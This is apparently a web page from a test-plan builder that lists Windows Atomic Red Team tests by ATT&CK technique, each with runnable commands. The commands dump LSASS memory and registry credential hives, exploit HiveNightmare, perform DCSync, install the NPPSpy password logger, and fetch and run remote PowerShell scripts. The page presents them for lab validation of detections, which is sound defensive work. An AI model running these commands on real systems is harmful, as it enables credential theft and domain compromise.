Atomic Red Team

Test-plan builder

Find runnable Atomic Red Team test cases for what you want to validate
Pick a technique, platform, or executor - or search by name - and get the executable test cases. Copy a command, run it on the listed platform in a lab, and confirm your detections fire. Pairs with the Detection Blind Spots on each actor page: see a gap, grab the test that exercises it.
filter by technique id in the URL: /atomic?technique=T1059

Matching tests · windows: 400
T1001.002 powershell elevated windows Steganographic Tarball Embedding
Steganography
This atomic test, named "Steganographic Tarball Embedding", simulates data obfuscation via steganography by embedding a tar archive (tarball) within an image. The test begins by ensuring the availability of the image file and the tarball file containing data. It then generates random passwords and saves them to a file. Subsequently, the tarball is created, containing the passwords file. The test executor command reads the contents of the image file and the tarball as byte arrays and appends them together to form a new image file. This process effectively embeds the tarball within the image, using steganography for data obfuscation. The technique enables attackers to transfer files across systems undetected: by embedding the tarball within the image, adversaries can obscure their activities, facilitating covert communication and data exfiltration.
Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte
T1001.002 powershell elevated windows Embedded Script in Image Execution via Extract-Invoke-PSImage
Steganography
This atomic test demonstrates data obfuscation via steganography, where a PowerShell script is concealed within an image file. The script is embedded using steganography techniques, making it undetectable by traditional security measures. It is hidden within the pixels of the image, enabling attackers to covertly transfer and execute malicious code across systems. The test begins by ensuring the availability of the malicious image file and the Extract-Invoke-PSImage script. It then extracts the hidden PowerShell script (decoded.ps1) from the image file using the Extract-Invoke-PSImage tool. The extracted script is decoded from base64 and saved as a separate PowerShell script (textExtraction.ps1), which is then executed. In this atomic test, the downloaded image file has the PowerShell command Start-Process notepad embedded within it in base64, to emulate an attacker's behaviour if they were to execute malware embedded within the image file.
cd "PathToAtomicsFolder\ExternalPayloads\"
Import-Module .\Extract-Invoke-PSImage.ps1
$extractedScript=Extract-Invoke-PSImage -Image "#{image_file}" -Out "$HOME\result.ps1"
$scriptContent = Get-Content "$HOME\result.ps1" -Raw
$base64Pattern = "(?<=^|[^A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}(==)?|[A-Za-z0-9+/]{3}=)?(?=$|[^A-Za-z0-9+/])"
$base64Strings = [regex]::Matches($scriptContent, $base64Pattern) | ForEach-Object { $_.Value }
$base64Strings | Set-Content "$HOME\decoded.ps1"
$decodedContent = Get-Content "$HOME\decoded.ps1" -Raw
$decodedText = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($decodedContent))
$textPattern = '^.+'  
$textMatches = [regex]::Matches($decodedText, $textPattern) | ForEach-Object { $_.Value }
$scriptPath = "$HOME\textExtraction.ps1"
$textMatches -join '' | Set-Content -Path $scriptPath
. "$HOME\textExtraction.ps1"
T1003 command_prompt elevated windows Gsecdump
OS Credential Dumping
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username entries followed by two 32-character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator). If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
T1003 powershell elevated windows Credential Dumping with NPPSpy
OS Credential Dumping
Changes the ProviderOrder registry key parameter and creates a key for NPPSpy. After the user logs in, the cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses the registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
T1003 powershell elevated windows Dump svchost.exe to gather RDP credentials
OS Credential Dumping
The svchost.exe process contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the following file created: $env:TEMP\svchost-exe.dmp.
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
T1003 powershell elevated windows Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
T1003 powershell elevated windows Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
T1003 powershell windows Dump Credential Manager using keymgr.dll and rundll32.exe
OS Credential Dumping
This test executes the exported function KRShowKeyMgr located in keymgr.dll using rundll32.exe. It opens a window that allows exporting stored Windows credentials from the Credential Manager to a file (.crd by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials and get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieved in multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.). Reference: https://twitter.com/0gtweet/status/1415671356239216653
rundll32.exe keymgr,KRShowKeyMgr
T1003 powershell windows Send NTLM Hash with RPC Test Connection
OS Credential Dumping
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Ref: https://twitter.com/vysecurity/status/974806438316072960
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 powershell elevated windows Dump LSASS.exe Memory using comsvcs.dll
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using direct system calls and API unhooking
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created: C:\windows\temp\dumpert.dmp. If you see a message saying "The system cannot find the path specified.", try using the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory using NanoDump
LSASS Memory
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanodump.dmp file in the temp directory.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 manual windows Dump LSASS.exe Memory using Windows Task Manager
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001 command_prompt elevated windows Offline Credential Theft With Mimikatz
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 command_prompt elevated windows LSASS read with pypykatz
LSASS Memory
Parses secrets hidden in the LSASS process with Python, similar to mimikatz's sekurlsa:: module. Python 3 must be installed; use the get_prereq_commands to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes on the screen. It will create a Python virtual environment within the External Payloads folder that can be deleted manually after test execution.
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.001 powershell elevated windows Dump LSASS.exe Memory using Out-Minidump.ps1
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This test uses a pure PowerShell implementation that calls the MiniDumpWriteDump Win32 API. Upon successful execution, you should see the following file created: $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
T1003.001 command_prompt elevated windows Create Mini Dump of LSASS.exe using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe. Upon successful execution, you should see the following file created: c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 powershell elevated windows Powershell Mimikatz
LSASS Memory
Dumps credentials from memory via PowerShell by invoking a remote Mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include an "access denied" error, which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privileges, you will see this error near the bottom of the output on the screen: "ERROR kuhl_m_sekurlsa_acquireLSA"
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
T1003.001 powershell elevated windows Dump LSASS with createdump.exe from .Net v5
LSASS Memory
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
T1003.001 powershell elevated windows Dump LSASS.exe using imported Microsoft DLLs
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
#{xordump_exe} -out #{output_file} -x 0x41
T1003.001 powershell elevated windows Dump LSASS.exe using lolbin rdrleakdiag.exe
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
    $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
    $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
    $binary_path = "File not found"
    exit 1
}
$lsass_pid = get-process lsass | select -expand id
if (-not (Test-Path -Path "$env:TEMP\t1003.001-13-rdrleakdiag")) { New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force }
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
T1003.001 command_prompt elevated windows Dump LSASS.exe Memory through Silent Process Exit
LSASS Memory
WerFault.exe (the Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios: either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just for lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process; from an attacker's standpoint this is appealing because their illicit credential extraction will appear benign, since from a defender's viewpoint it is within the realm of normal activity. Upon successful execution, you should find the dump file in the directory of your choice or in "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.002 command_prompt elevated windows Registry dump of SAM, creds, and secrets
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys, then processed locally using https://github.com/Neohapsis/creddump7. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003.002 command_prompt elevated windows Registry parse with pypykatz
Security Account Manager
Parses registry hives to obtain stored credentials. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.002 command_prompt elevated windows esentutl.exe SAM copy
Security Account Manager
Copy the SAM hive using the esentutl.exe utility. This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
T1003.002 powershell elevated windows PowerDump Hashes and Usernames from Registry
Security Account Manager
Executes a hashdump by reading the hashes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
T1003.002 command_prompt windows dump volume shadow copy hives with certutil
Security Account Manager
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
T1003.002 powershell windows dump volume shadow copy hives with System.IO.File
Security Account Manager
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
T1003.002 powershell windows WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Security Account Manager
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via a function of WinPwn.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive  
T1003.002 command_prompt elevated windows Dumping of SAM, creds, and secrets(Reg Export)
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. This test uses reg export to perform this behavior. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with vssadmin
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
T1003.003 command_prompt elevated windows Copy NTDS.dit from Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller.
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
T1003.003 command_prompt elevated windows Dump Active Directory Database with NTDSUtil
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory.
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with WMI
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely with WMI
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
T1003.003 command_prompt elevated windows Create Volume Shadow Copy remotely (WMI) with esentutl
NTDS
This test is intended to be run from a remote workstation with domain admin context. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
T1003.003 powershell elevated windows Create Volume Shadow Copy with Powershell
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')
T1003.003 command_prompt elevated windows Create Symlink to Volume Shadow Copy
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
T1003.003 command_prompt elevated windows Create Volume Shadow Copy with diskshadow
NTDS
This test is intended to be run on a domain controller. It is an alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit.
mkdir c:\exfil
diskshadow.exe /s #(unknown)
T1003.003 powershell elevated windows Copy NTDS in low level NTFS acquisition via MFT parsing
NTDS
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
T1003.003 powershell elevated windows Copy NTDS in low level NTFS acquisition via fsutil
NTDS
This test is intended to be run on a domain Controller. UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
T1003.004 command_prompt elevated windows Dumping LSA Secrets
LSA Secrets
Dump the secrets key from the Windows registry. When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc.
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
T1003.004 powershell elevated windows Dump Kerberos Tickets from LSA using dumper.ps1
LSA Secrets
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type. If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session. Ref: https://github.com/MzHmO/PowershellKerberos/ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')  
T1003.005 command_prompt windows Cached Credential Dump via Cmdkey
Cached Domain Credentials
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe. Credentials listed with Cmdkey only pertain to the current user. Passwords will not be displayed once they are stored. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
cmdkey /list
T1003.006 command_prompt windows DCSync (Active Directory)
DCSync
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729)
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
T1003.006 powershell windows Run DSInternals Get-ADReplAccount
DCSync
The following Atomic will run Get-ADReplAccount from DSInternals. Upon successful execution, domain and credentials will appear in stdout. [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) (CrowdStrike StellarParticle). https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
Get-ADReplAccount -All -Server #{logonserver}
T1005 powershell windows Search files of interest and save them to a single zip file (Windows)
Data from Local System
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
} else {
  Write-Host "No files found with the specified extensions."
}
T1006 powershell elevated windows Read volume boot sector via DOS device path (PowerShell)
Direct Volume Access
This test uses PowerShell to open a handle on the drive volume via the \\.\ [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform a direct-access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. For an NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))): offset 00000000: `EB 52 90 4E 54 46 53 20` (ASCII `ëR?NTFS `).
$buffer = New-Object byte[] 11
$handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite'
$handle.Read($buffer, 0, $buffer.Length)
$handle.Close()
Format-Hex -InputObject $buffer
T1007 command_prompt elevated windows System Service Discovery
System Service Discovery
Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
tasklist.exe /svc
sc query
sc query state= all
T1007 command_prompt windows System Service Discovery - net.exe
System Service Discovery
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in the temp directory called service-list.txt.
net.exe start >> #{output_file}
T1007 command_prompt windows Get-Service Execution
System Service Discovery
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
powershell.exe Get-Service
T1007 command_prompt windows System Service Discovery - Windows Scheduled Tasks (schtasks)
System Service Discovery
Enumerates scheduled tasks on Windows using schtasks.exe.
schtasks /query /fo LIST /v
T1007 powershell windows System Service Discovery - Services Registry Enumeration
System Service Discovery
Enumerates Windows services by reading the Services registry key (HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control Manager APIs or CLI tools such as sc.exe or Get-Service.
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
  ForEach-Object {
    $p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
    [PSCustomObject]@{
      Name        = $_.PSChildName
      DisplayName = $p.DisplayName
      ImagePath   = $p.ImagePath
      StartType   = $p.Start
    }
  }
T1010 command_prompt windows List Process Main Windows - C# .NET
Application Window Discovery
Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
T1012 command_prompt elevated windows Query Registry
Query Registry
Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 powershell elevated windows Query Registry with Powershell cmdlets
Query Registry
Queries the Windows Registry with PowerShell cmdlets, i.e., Get-Item and Get-ChildItem. The same results as the reg query test above can be obtained this way. Unlike "reg query", which spawns reg.exe, the cmdlets run inside the existing PowerShell process and create no new process, which may evade detections that rely on process-creation monitoring.
